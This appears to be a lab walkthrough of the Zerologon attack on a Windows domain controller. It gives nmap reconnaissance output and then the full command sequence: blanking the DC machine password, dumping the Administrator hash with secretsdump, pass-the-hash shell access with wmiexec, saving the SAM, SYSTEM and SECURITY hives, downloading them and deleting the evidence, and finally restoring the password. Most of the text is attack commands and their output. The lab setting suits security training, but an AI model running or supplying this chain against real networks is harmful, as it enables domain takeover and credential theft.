KEY:
====
Windows commands start with: C:\>
Linux commands start with: #

Before you begin:
=================
you need the Domain Name for the Windows Domain Controller you are attacking
you need the NetBIOS Name (PC name) for the Windows Domain Controller you are attacking
you need the IP address for the Windows Domain Controller you are attacking
That is all!!

Nmap to the rescue:
===================
sudo nmap -sV 192.168.1.28
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-15 17:23 PDT
Nmap scan report for 192.168.1.28
Host is up (0.00019s latency).
Not shown: 989 filtered ports
PORT     STATE SERVICE      VERSION
53/tcp   open  domain?
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2020-10-15 20:58:08Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: zerologon.learn.now, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: ZEROLOGON)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: zerologon.learn.now, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.80%I=7%D=10/15%Time=5F88E827%P=x86_64-pc-linux-gnu%r(DNS
SF:VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x04\0\x01\0\0\0\0\0\0\x07version
SF:\x04bind\0\0\x10\0\x03");
MAC Address: 08:00:27:AA:C2:F6 (Oracle VirtualBox virtual NIC)
Service Info: Host: ZEROLOGON-DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 147.43 seconds


change directory to the zerologon exploit folder:
=================================================

# cd ~/zerologon


run the first script to exploit the machine:
============================================
this will set the password to an empty string
ZEROLOGON-DC is the PC's name
192.168.1.28 is the IP address it was assigned on my network

# python3 set_empty_pw.py ZEROLOGON-DC 192.168.1.28

look for:
Success! DC should now have the empty string as its machine password.


run the second script to dump the hashes:
=========================================
ZEROLOGON/ZEROLOGON-DC\$@192.168.1.28
<Domain> / <NETBIOS name (PC name)> \$@ <ip address of server we are attacking>
it is important to have \$@ in between the NetBIOS name and the IP 

# secretsdump.py -hashes :31d6cfe0d16ae931b73c59d7e0c089c0 ZEROLOGON/ZEROLOGON-DC\$@192.168.1.28

looking for:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:06ebd4bf3fa4fe306259c45e389dc976:::


run the third script to get terminal on victim machine:
=======================================================
ZEROLOGON/Administrator@192.168.1.28
<Domain> / <user name> @ <ip address> -hashes <administrator hash>

# wmiexec.py ZEROLOGON/Administrator@192.168.1.28 -hashes aad3b435b51404eeaad3b435b51404ee:06ebd4bf3fa4fe306259c45e389dc976

Looking for:
C:\>


Commands to run once on victim machine:
=======================================
verify who you are logged in as:
C:\>whoami
zerologon\administrator

verify the system you are logged into:
C:\>hostname
ZEROLOGON-DC

Prep logon credentials for download:
C:\>reg save HKLM\SYSTEM system.save
The operation completed successfully.

C:\>reg save HKLM\SAM sam.save
The operation completed successfully.

C:\>reg save HKLM\SECURITY security.save
The operation completed successfully.

Download logon credentials:
C:\>get system.save
[*] Downloading C:\\system.save

C:\>get sam.save
[*] Downloading C:\\sam.save

C:\>get security.save
[*] Downloading C:\\security.save

Clean up:
C:\>del /f system.save
C:\>del /f sam.save
C:\>del /f security.save


Exit out and go back to Linux terminal: 
=======================================

# secretsdump.py -sam sam.save -system system.save -security security.save LOCAL

Looking for:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:06ebd4bf3fa4fe306259c45e389dc976:::


Restore the original password:
==============================
ZEROLOGON-DC 192.168.1.28 aad3b435b51404eeaad3b435b51404ee:6d4a95ae230e5ce2c1dbfd780e340cbc
<pc name> <ip address> <admin hash>

# python3 reinstall_original_pw.py ZEROLOGON-DC 192.168.1.28 aad3b435b51404eeaad3b435b51404ee:6d4a95ae230e5ce2c1dbfd780e340cbc
